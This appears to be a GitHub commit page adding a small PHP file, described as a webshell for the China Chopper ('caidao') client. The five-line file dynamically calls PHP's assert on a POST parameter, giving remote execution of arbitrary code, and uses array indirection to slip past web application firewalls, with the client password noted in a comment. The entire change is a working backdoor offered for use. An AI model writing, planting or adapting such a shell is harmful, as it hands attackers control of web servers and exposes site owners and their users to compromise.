Skip to content

Commit

Permalink
add php webshell for caidao
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed Oct 20, 2014
1 parent 5fc033c commit c80515a
Showing 1 changed file with 5 additions and 0 deletions.
5 changes: 5 additions & 0 deletions php/pass-waf-2014-10-19.php
@@ -0,0 +1,5 @@
<?php
$item['tt'] = 'assert';
$array[] = $item;
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
?>

0 comments on commit c80515a

Please sign in to comment.